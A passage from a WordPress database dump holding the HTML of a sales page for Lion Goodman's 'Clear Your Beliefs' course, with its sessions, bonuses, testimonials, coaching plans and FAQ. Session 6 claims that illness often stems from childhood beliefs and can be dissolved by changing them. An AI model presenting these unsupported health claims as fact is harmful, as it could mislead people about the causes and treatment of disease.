class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“Thank you taking me back to the beginning to help me hit the “reset” button. You demonstrated your mastery and provided an unbelievable learning opportunity. Thank you for showing me that there are no limits in the Imaginal Realm, and for reinforcing the power that resides in the BeliefCloset Process. I am humbled and very grateful. I may never truly be able to comprehend all that happened and the changes to my mindset and my life. I wish I could put how I feel into words. My outlook is brighter, my steps seems lighter, and losing weight is now just an overdue task to take care of, without all the shame and emotions that had always been attached to it. ”</em>\r\n<div style="text-align: right;"><strong>~ S.K., Life Coach, Ontario, Canada </strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 4: </span> <strong>Clear Your Outdated Beliefs About Love and Relationships</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4.jpg"><img class=" wp-image-312 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4-300x177.jpg" alt="sess4" width="237" height="141" /></a>In this session, you’ll delete beliefs that interfere with your personal relationships.If you’re married, are you happy and secure? Or are you anxious about the future? If you’re not in a relationship, what’s holding you back from finding your ideal mate?Humans are social creatures – we must relate to others to survive. At our core, we want a security and safety, but we also want passion and romance. You learned “what love is” from your parents – so it’s no wonder that you’re confused! Most of us repeat patterns we learned from our early childhood. We watched our parents interact, and Mom and Dad’s relationship became our model of what a relationship is supposed to look like. Love was contaminated by disdain, contempt, withdrawal, or abuse. We were programmed to repeat their patterns – without conscious choice. This session looks at early infant bonding patterns and how those patterns get reproduced in our adult relationships unconsciously – until we change them.\r\n\r\n</div>\r\n&nbsp;\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 4, you will:</strong>\r\n<ul>\r\n	<li>Look deeply into the childhood patterns that enabled you to survive and thrive</li>\r\n	<li>See which of your beliefs now interfere with your intimate relationships</li>\r\n	<li>Discover how easy it is to shift these beliefs at the core of the psyche and transform relationship difficulties into vibrant, loving interactions</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“What an extraordinary experience! The process is simple, straightforward, powerful, and FUN! Changing beliefs is no longer a heavy, ponderous, months-long process. I finished my session with a smile, and the anxiety triggered by my old beliefs has disappeared. My new ’belief-outfits’ are perfect for me, and I’m wearing them with joy and enthusiasm!”</em>\r\n<div style="text-align: right;"><strong>~ D. T., Physical Therapist, Denver, CO </strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 5: </span> <strong>Clear Your Old Beliefs About Money and Work</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5.jpg"><img class=" wp-image-313 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5-300x200.jpg" alt="sess5" width="222" height="148" /></a>In this session, you’ll focus on money, wealth and abundance – or the lack thereof!\r\n\r\nWhat do you believe about earning a living in today’s economy? Is money really the root of all evil?\r\n\r\nIf you want to experience true abundance, you have to eliminate the belief that money is bad – or a problem. Your current financial state is a reflection of the beliefs you inherited from your family, religion, and culture. Can you see their influence?\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 5, you will:</strong>\r\n<ul>\r\n	<li>Examine your family and cultural beliefs about money, work, poverty and “deservingness.”</li>\r\n	<li>Remove beliefs that create stumbling blocks in the way of natural abundance</li>\r\n	<li>Create new beliefs that enable you to open to the flow of money and resources, and the life of abundance you want - and deserve</li>\r\n	<li>Learn why affirmations alone, and the “Law of Attraction,” don’t work, regardless of how diligently you practice them</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“The BeliefCloset Process is like a magic wand – I can easily and quickly change any aspect of myself by changing my beliefs.”</em>\r\n<div style="text-align: right;"><strong> ~ T. S., Business Owner, Yukon, Canada</strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 6: </span> <strong>Clear Uncomfortable Beliefs About Your Body and Health</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg"><img class=" wp-image-314 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg" alt="sess6" width="205" height="136" /></a>In this session, you’ll focus on issues and problems with your health – whether they appear in your physical, emotional, mental or spiritual body.Ill health (dis-ease) is often the result of beliefs that were indoctrinated into you, or conclusions you came to when you came to certain conclusions during your early childhood.What do you believe and perceive about your body? Your health? Your age? Your vitality? Your ability to heal? The future of your health?\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 6, you will:</strong>\r\n<ul>\r\n	<li>Identify old beliefs that stand between you and vibrant health</li>\r\n	<li>Recognize beliefs that make you vulnerable to disease and injury</li>\r\n	<li>Dissolve old beliefs at the root of illness, bad habits and lifestyle stress</li>\r\n	<li>Imagine the healthy, vibrant body you want, and create it consciously with new beliefs</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“The BeliefCloset Process gave me the room to safely acknowledge and work through my hidden, unconscious beliefs. I am now free of the past and can see myself more clearly than ever before.”</em>\r\n<div style="text-align: right;"><strong>~ T. L., Healer, Stamford, CT </strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 7: </span> <strong>Clear Out The Rest Of The Junk In Your BeliefCloset!</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7.jpg"><img class=" wp-image-265 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7-300x187.jpg" alt="sess7" width="214" height="134" /></a>In this final session, you’ll examine any remaining issues or challenges in your life, and learn how to use the <strong><em>BeliefCloset Process</em></strong> to eliminate them, one belief at a time.\r\n\r\nYou’ll learn additional techniques for eliminating uncomfortable sensations and feelings, and open opportunities to experience the miracles of life.\r\n\r\nWhen you know that your feelings, perceptions, and circumstances are all created by your beliefs, and when you have a technique for identifying them and eliminating them, you’ll have the power of any Creator – the power to shape the world as you decide, creating a better place for you and those you love.\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 7, you will:</strong>\r\n<ul>\r\n	<li>Scan your life for problems and interference, and put them under the <em>BeliefCloset</em> microscope so you can uproot negative core beliefs – where they live</li>\r\n	<li>Learn to use the <em>BeliefCloset Process</em> on your own, anytime, so you can become the Captain of your fate – and your own experience – for the rest of your life</li>\r\n	<li>Find your <strong>True Self</strong> – the creator of your reality – and recognize it as the truth of who you really are</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<!--[wpfcNOT]-->\r\n\r\n&nbsp;\r\n<h1 id="bonus">Support On Your Journey Into Your Subconscious Mind</h1>\r\n<strong>Get Optional Support Sessions with a Professional <em>Clear Your Beliefs</em> Coach.</strong>\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support.jpg"><img class=" wp-image-318 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support-300x254.jpg" alt="support" width="182" height="153" /></a>If you choose to add the Coaching Option to your purchase, you’ll be paired with a professional Clear Your Beliefs Coach who will meet with you by phone (or Skype) each week.\r\n\r\nHe or she will offer live, one-on-one support during your belief-clearing journey at a time that''s convenient for you, on a day that fits your schedule.\r\n\r\nOur coaches are located throughout the U.S. and Canada, and 10 countries around the world, including Europe, Australasia, and South Africa. Your <em>Clear Your Beliefs</em> Coach will guide you through any difficult inner terrain you might encounter, and they''ll take you even deeper into your own subconscious mind. They will help you identify and delete difficult-to-locate core beliefs.\r\n\r\nTake advantage of this up-close-and-personal support to help you work through beliefs you uncover during the program. Support sessions are optional, and are provided at an additional cost. Choose the plan that suits you - from the program-only, to full support. Click below for a complete description.\r\n\r\n&nbsp;\r\n<div class="cb">\r\n\r\n<a href="http://clearyourbeliefs.com/products_categories/coaching"><button class="btn first">Select Your Plan</button></a>\r\n<p style="text-align: center;">OR</p>\r\n<a href="http://clearyourbeliefs.com/sign-up-for-the-clear-your-beliefs-newsletter"><button class="btn">Free eBook</button></a>\r\n\r\n</div>\r\n&nbsp;\r\n<h1 id="bonus">You''ll Also Receive the <em>Clear Your Beliefs</em> <em>Bonus Collection</em></h1>\r\nIn addition to these seven transformational sessions, you’ll also receive these awesome bonus interviews and gifts. These two world luminaries will complement your learning and progress during the course, and take your understanding and practice to an even deeper level.\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session">Bonus #1: <strong>Love: What Makes It So Confusing?\r\n<em>Guest Faculty: Carista Luminare, Ph.D.</em></strong></span></div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon1.jpg"><img class="wp-image-378 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon1.jpg" alt="bon1" width="174" height="199" /></a>We all want love, but something keeps getting in the way. The partner we’ve got isn’t quite right for us, or the one we want isn’t available. What’s going on?In this Bonus Interview, Lion talks with Carista Luminare, Ph.D., author of <em>Parenting Begins Before Conception</em>, creator of the True Self Way, President of Luminary Leadership Institute, and teacher of <em>Confused About Love? How to Create a Secure and Passionate Relationship.\r\n</em>(Carista is also known as <em>Lion''s Fiance''</em>)\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">Carista will share her latest research on childhood attachment, and how our early bonding patterns with our parents play out – again and again – in our adult relationships. “We’re confused about what love is, and how to love. We can’t seem to get out of those repeated loops where we hurt each other. The answers are all right here, in our neurology, our earliest programming, and our beliefs about love and how to get it.”</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">Learn how to determine your own (and your partner’s) attachment style, and practical techniques for healing old wounds and bringing passion and security back into your relationship.</div>\r\n<div class="module_body"></div>\r\n<div class="module_body"><strong>Carista Luminare</strong>, Ph.D., is President of Luminary Leadership Institute. She has 30 years experience as a consultant, counselor and coach to executives, entrepreneurs, individuals and organizations. She developed a comprehensive holistic parenting methodology, described in her groundbreaking book, <em>"Parenting Begins Before Conception."</em> In partnership with Lion, she developed LLI’s leading-edge evolutionary leadership program. After graduating from Harvard University in Psychology and Social Relations in 1978, she pioneered educational and therapeutic programs focused on the integration of the personality and soul.</div>\r\n</div>\r\n<!-- b2 -->\r\n\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“I clearly saw how and why I was doing the things I do. I realized that my difficulties stemmed from my beliefs – especially those I was unaware of. I appreciate the sincerity and integrity of the BeliefCloset Process.”</em>\r\n<div style="text-align: right;"><strong> ~ R. D., Benedictine Priest, San Francisco, CA </strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<!--[wpfcNOT]-->\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session">Bonus #2 <strong>- The LoveStyle Profile Quiz </strong></span></div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21.jpg"><img class=" wp-image-242 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21-300x100.jpg" alt="bon2" width="270" height="90" /></a>Take this 5-minute assessment to learn how your childhood bonding patterns impact your adult relationships.\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">Developed by Carista Luminare and Lion Goodman, you’ll receive a complete ten-page report that introduces you to the 5 LoveStyles, and it will show you where you are on each spectrum.</div>\r\n<div class="module_body"></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“The BeliefCloset Process has been exceedingly helpful to me on my own internal journey, and it''s a tool I reach for frequently in my psychotherapy practice. It leads to discovery, insight, and change, often with an element of lyricism and poignancy. The explorations are both gentle and profound, and it provides rich material for reflection in the endlessly imaginative outfits that appear in the BeliefCloset. It provides real world results for my clients, and I continue to use, both in my practice and in my own personal growth.”</em>\r\n<div style="text-align: right;"><strong>~ Martha Bear, Psychotherapist, BeliefCloset Practitioner</strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session">Bonus #3: <strong> The Spiritual Technology of Manifesting with Beliefs Guest Faculty: Anodea Judith, Ph.D. </strong></span></div>\r\n<div class="module_body">\r\n\r\nWe’ve all heard about affirmations and the Law of Attraction. Why don’t they work? There’s a very specific reason, and you’ll learn what it is in this bonus interview with internationally acclaimed author and teacher Anodea Judith.\r\n\r\n</div>\r\n<div class="module_body">\r\n\r\nAnodea <a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon3.jpg"><img class=" wp-image-396 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon3.jpg" alt="bon3" width="189" height="169" /></a>is considered one of the world’s experts on the chakras. Her ten books have sold more than 500,000 copies worldwide.\r\n\r\nIn this informative conversation, Lion and Anodea discuss their book, <em>Creating On Purpose</em>, a step-by-step manual for turning your dreams into reality.\r\n\r\nBeliefs are at the core of the manifestation process, and the BeliefCloset Process was originally developed for their “<em>Creation is Ecstasy,</em>” workshop, which they taught internationally to great acclaim.\r\n\r\n</div>\r\n<div class="module_body">The book can be used to move any idea down through the chakras and into the real world. You’ll receive the first two chapters of the book as Bonus #4, below.</div>\r\n<div class="module_body">\r\n\r\nAnodea Judith, Ph.D.\r\n\r\nis the author of <em>Wheels of Life, Eastern Body/Western Mind, Creating On Purpose</em> (with Lion Goodman), and <em>The Global Heart Awakens</em>. She leads workshops on the chakras, psychological development, and spiritual transformation in the U.S. and around the world. Her books are considered classics in their field, and are used by many schools as textbooks for classes on healing and psychological development.\r\n\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>"I uncovered beliefs I didn''t know I had, including: “<i>I''m wretched. There is no God. I am ashamed of myself. I am unworthy of God.”</i> It was an intense process! Each time I deleted an old belief, something shifted at my core. I then replaced each one with a positive belief for my life. That old heavy weight around my heart just lifted off me. I''ve been in awe ever since. You''ve found a powerful way to access the deep subconscious mind!" </em>\r\n<div style="text-align: right;"><strong>~ Maria Garcia, yoga teacher and BeliefCloset Practitioner</strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session"><span class="session">Bonus #4: <strong> Excerpt from the book, "<em>Creating on Purpose: The Spiritual Technology of Manifesting Through the Chakras"</em></strong></span></span></div>\r\n<div class="module_body">\r\n\r\n<strong><em><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose.jpg"><img class=" wp-image-475 alignleft" style="box-shadow: none!important;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose-294x300.jpg" alt="creating-on-purpose" width="189" height="193" /></a>Creating On Purpose</em></strong> is a step-by-step guide to the manifestation process. In this free sample, you will:\r\n<ul style="padding-left: 20px;">\r\n	<li>Be called to awaken your already-powerful ability to create the life of your dreams</li>\r\n	<li>Learn how the chakras represent two human challenges: <strong>liberation</strong> (from the bottom up) and <strong>manifestation</strong> (from the top down)</li>\r\n	<li>Understand the 7 chakras as stepping stones along the path of the manifestation process</li>\r\n	<li>Gain an understanding of resistance, obstacles, and barriers that come up as you create what you want in life</li>\r\n	<li>Learn a process that can strengthen your power of intention</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“This valuable tool will enhance your life in ways you cannot imagine. It’s added extraordinary value to my life. I feel calmer overall, and know I have a tool that will enable me to keep growing and expanding.”</em>\r\n<div style="text-align: right;"><strong><strong>~ C.T., Performance and Life Coach</strong></strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session">Bonus #5:<strong> Transform Your Beliefs eBook</strong></span></div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/TYB-Cover.jpg"><img class=" wp-image-433 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/TYB-Cover.jpg" alt="TYB Cover" width="159" height="206" /></a>\r\n\r\n</div>\r\n<div class="module_body">\r\n\r\nYou’ll also receive a copy of Lion’s multimedia eBook, “<em>Transform Your Beliefs: Unleash Your Magnificence and Change Your World</em>.” Lion explains the theory behind <em>The BeliefCloset Process</em>, and offers an explanation for why we do what we do, and why it’s so difficult to change our habitual patterns of thought and behavior. It’s a beautifully produced primer on beliefs – where they come from, how they affect us, and what it takes to change them.\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“I now feel empowered to create the life I want, and believe I can accomplish all my goals through shifting my thinking. I am no longer fearful of my limiting beliefs, because now I have a tool to change them.”</em>\r\n<div style="text-align: right;"><strong><strong>– M.M., International Business Consultant</strong></strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session">Bonus #6: <strong>Complete Transcripts of the Course</strong></span></div>\r\n<div class="module_body">\r\n\r\nYou''ll receive a <strong>complete set of downloadable PDF transcripts</strong> from the course, so you can refer to the material anytime in written form. This includes all 7 classes, plus two bonus interviews!\r\n\r\n</div>\r\n</div>\r\n&nbsp;\r\n<div class="cb">\r\n\r\n<a href="http://clearyourbeliefs.com/products_categories/coaching"><button class="btn first">Select Your Plan</button></a>\r\n<p style="text-align: center;">OR</p>\r\n<a href="http://clearyourbeliefs.com/sign-up-for-the-clear-your-beliefs-newsletter"><button class="btn">Free eBook</button></a>\r\n\r\n</div>\r\n&nbsp;\r\n<h1>Are You A Change Agent? Join the Global Community of BeliefCloset Practitioners</h1>\r\nAfter you complete the course, you’ll be given an opportunity to register for the <strong>BeliefCloset Practitioner Training.</strong>\r\n\r\n<img class=" wp-image-249 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/global1-300x203.jpg" alt="global" width="191" height="129" />In this 10-week course, you’ll learn how to professionally guide others through the BeliefCloset Process.\r\n\r\nJoin our worldwide community of change agents – including therapists, coaches, and healers of all types. We help our clients, friends, and family members transform their lives by clearing their beliefs at the core of the psyche.\r\n\r\n&nbsp;\r\n<h1>Register Today And You’ll Receive:</h1>\r\n<div class="icons">\r\n<div class="icon_box">\r\n<div class="icon a1"></div>\r\n<strong>Seven 90-Minute Class Sessions with Lion Goodman</strong> – This is a rare opportunity to learn from the creator of one of the world’s most powerful belief-change technologies – from the comfort of your own home. Each class session helps you learn the specific skills to change your beliefs – easily, anytime – with 60 minutes of teaching followed by 30 minutes of Q&amp;A. The audio recordings are available for you to listen online, or you can download them in high-quality MP3 format and listen to them anytime and anywhere on your audio player.\r\n\r\n</div>\r\n<!--[wpfcNOT]-->\r\n\r\n&nbsp;\r\n<div class="icon_box">\r\n<div class="icon a3"></div>\r\n<strong>Nine PDF Transcripts – </strong>In addition to the high quality MP3 audios, you’ll also receive the entire class transcribed word-for-word in PDF format. This includes seven classes and two bonus calls. You can review, print and highlight the most important insights and practices.\r\n\r\n</div>\r\n</div>\r\n<h1>Plus... the <em>Clear Your Beliefs BONUS Collection</em></h1>\r\n<ul>\r\n	<li><em>What Makes Love So Confusing?</em> – Audio interview featuring Carista Luminare, Ph.D.</li>\r\n	<li><em>The Spiritual Technology of Manifesting with Beliefs</em> – Audio interview featuring Anodea Judith, Ph.D.</li>\r\n	<li>Your Childhood Bonding Pattern Assessment: <em>The LoveStyle Profile Quiz</em></li>\r\n	<li><em>Creating On Purpose: The Spiritual Technology of Manifesting through the Chakras </em> – The first 2 chapters from the book by Lion Goodman and Anodea Judith (PDF)</li>\r\n	<li>Multimedia eBook: <em>Transform Your Beliefs: Unleash Your Magnificence and Change Your World</em> by Lion Goodman (PDF)</li>\r\n</ul>\r\n&nbsp;\r\n<h1>Take This Opportunity For Deep Learning And Transformation</h1>\r\nThis is an opportunity to learn <em>and practice</em> shifting your life – from the core of your psyche. You’ll have a direct experience of the power of <em>The BeliefCloset Process</em>, and you''ll see for yourself how easy it is to significantly change your life.\r\n\r\nYou''ll become part of a global community of like-minded and love-hearted people who dive deeply into themselves to transform the world from the inside out.\r\n\r\nYou can take this journey on your own, one recorded session at a time, or you can sign up for support from a <em>Clear Your Beliefs Coach</em>, a trained professional who will accompany you and guide you through the process. Our coaches are highly trained and qualified to help you deal with any issue you have, in any part of your life, regardless of how long it’s been interfering with your success, joy, and freedom.\r\n<h6>[Note that <em>Clear Your Beliefs Coaches</em> are trained to help you change your own beliefs and remove the impact they''ve had on your life. They are not licensed psychotherapists or physicians. If you have a medical or mental health issue, please consult an appropriate professional who specializes in your particular diagnosis.]</h6>\r\nIn addition to being personally guided by Lion Goodman, you’ll save time and money on the cost of attending a workshop or coaching in person. (Fees, travel, meals and accommodations would add up to thousands of dollars). From the comfort of your home, you’ll go through the program at your own pace.\r\n\r\nIf you’re serious about bringing more freedom, success and joy into your life, you owe it to yourself, your loved ones, and our world – to take this one-of-a-kind training. Transform your life by transforming your beliefs!\r\n\r\nIf you’re ready to clear your old beliefs, click the register button below to choose the method best suited to you.\r\n\r\n&nbsp;\r\n<div class="cb">\r\n\r\n<a href="http://clearyourbeliefs.com/products_categories/coaching"><button class="btn first">Select Your Plan</button></a>\r\n<p style="text-align: center;">OR</p>\r\n<a href="http://clearyourbeliefs.com/sign-up-for-the-clear-your-beliefs-newsletter"><button class="btn">Free eBook</button></a>\r\n\r\n</div>\r\n&nbsp;\r\n<h1>About Lion Goodman</h1>\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face.jpg"><img class="alignleft wp-image-303 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face-260x300.jpg" alt="lion-face" width="151" height="175" /></a>Lion is C.E.O. of Luminary Leadership Institute, a consulting firm dedicated to bringing leaders of businesses and organizations into alignment with their True Self and their highest virtues.\r\n\r\nHe is the creator of <strong><em>The BeliefCloset Process</em></strong>®, and author of <em>Transform Your Beliefs: Unleash Your Magnificence and Change Your World.</em>\r\n\r\nHe is the co-author, with Anodea Judith, of <em>Creating on Purpose: The Spiritual Technology of Manifesting through the Chakras</em> <em>.</em> With his partner, Carista Luminare, Ph.D., he created a program for couples and singles who want to create a more secure and passionate relationship:<em><strong> Confused About Love? The Keys to Creating a Secure and Passionate Relationship.</strong></em>\r\n\r\nLion has more than 35 years experience in transformational coaching, entrepreneurial business, spiritual practice, and men’s work. He is a co-founder of <em>The Tribe of Men</em>, an initiatory program for men, and served as Director of Men’s Programs for The Shift Network, where he created programs that served more than 20,000 people around the world. He blogs at www.GoodMenProject.com and www.YourTango.com.\r\n\r\n&nbsp;\r\n<h1 class="center">Satisfaction Guaranteed</h1>\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar.jpg"><img class="size-medium wp-image-702 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar-300x131.jpg" alt="15dayguar" width="300" height="131" /></a>Your satisfaction is 100% guaranteed! If you don’t absolutely LOVE the Clear Your Beliefs program, led by Lion Goodman, and you don''t feel that it serves your growth and development, simply let us know within 15 days of your purchase, and we’ll happily issue you a full refund. And just for trying it out, you can keep the bonuses as our gift to you. (Refund policy applies only to the recorded program and unused coaching hours.)\r\n\r\n&nbsp;\r\n<div class="s20"></div>\r\n<h1 id="faq">Frequently Asked Questions</h1>\r\n&nbsp;\r\n\r\n<strong>Q: What is a virtual course?</strong>\r\n\r\nA: It’s a great way to engage with professional teachers from the comfort of your own home. All you need is a computer and an mp3 audio player. If you choose the option of working with a Clear Your Beliefs coach, you’ll work by phone or Skype at a time that’s most convenient to you.\r\n\r\nIn addition to excellent guidance and feedback, you can ask questions and deepen your exploration of the course themes. Note that you will be calling your coach for your support sessions, and your telephone service provider will charge you according to your existing long-distance calling plan. You can use Skype or Google Voice to call your coach.\r\n\r\n&nbsp;\r\n\r\n<strong> Q: How long will I have access to the course?</strong>\r\n\r\nA: You can download the course recordings, transcripts, and bonus materials from our online media archive to your own computer, so you’ll have copies permanently. Your Passcode, issued upon purchase, will allow you access to the material on the site for one year from your date of purchase.\r\n\r\n&nbsp;\r\n\r\n<strong> Q: Are there scholarships available?</strong>\r\n\r\nA: We offer a limited number of partial scholarships each year, giving preference to veterans, to those in developing countries, and to those who are doing important but underpaid work. If you would like to apply for a scholarship, please send a written request to info@clearyourbeliefs.com, with a description of your circumstances and your offer of what you can pay.\r\n\r\n&nbsp;\r\n\r\n<strong> Q: What is your refund policy?</strong>\r\n\r\nA: Your satisfaction with this course is our highest priority! If you find within 15 days of purchase that the course is not meeting your needs, or the process is simply not working for you, please send a description of your concern to <a href="mailto:support@clearyourbeliefs.com">support@clearyourbeliefs.com</a>. If we cannot address your concerns and make it work for you, we offer a full refund (minus any used coaching time) so you can try out the course risk-free. No refunds are available after 15 days from your date of purchase.\r\n\r\n&nbsp;\r\n\r\n<strong> Q: How can I reach Customer Support?</strong>\r\n\r\nA: Please send an email to <a href="mailto:support@clearyourbeliefs.com">support@clearyourbeliefs.com</a>. We’ll get back to you within 48 hours (sometimes longer over weekends).\r\n\r\n&nbsp;\r\n\r\n<strong> Q: What is your Privacy Policy?</strong>\r\n\r\nA: We take your privacy very seriously. Your name and email are never shared with any other organization or person. We add your name and email to our customer database, and periodically send you newsletters and announcements with information about our programs and products. Our mailing list includes a number of brands, so you may see emails from ClearYourBeliefs.com, BeliefCloset.com, or ConfusedAboutLove.com.\r\n\r\nYou may unsubscribe anytime you wish. Unsubscribing will opt you out of all of our communications, so you will not hear about our other opportunities or our curriculum.\r\n\r\nAll information that you provide to your <em>Clear Your Beliefs Coach</em> will be held in strictest confidence, and will never be shared with anyone, with one exception: your Coach may communicate and consult with Lion Goodman for his support and for quality control purposes. He holds all personal information in the strictest of confidence, as well.', 'Clear Your Beliefs', '', 'inherit', 'closed', 'open', '', '915-revision-v1', '', '', '2014-06-17 13:37:31', '2014-06-17 18:37:31', '', 915, 'http://clearyourbeliefs.com/915-revision-v1', 0, 'revision', '', 0);
INSERT INTO `cyb_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
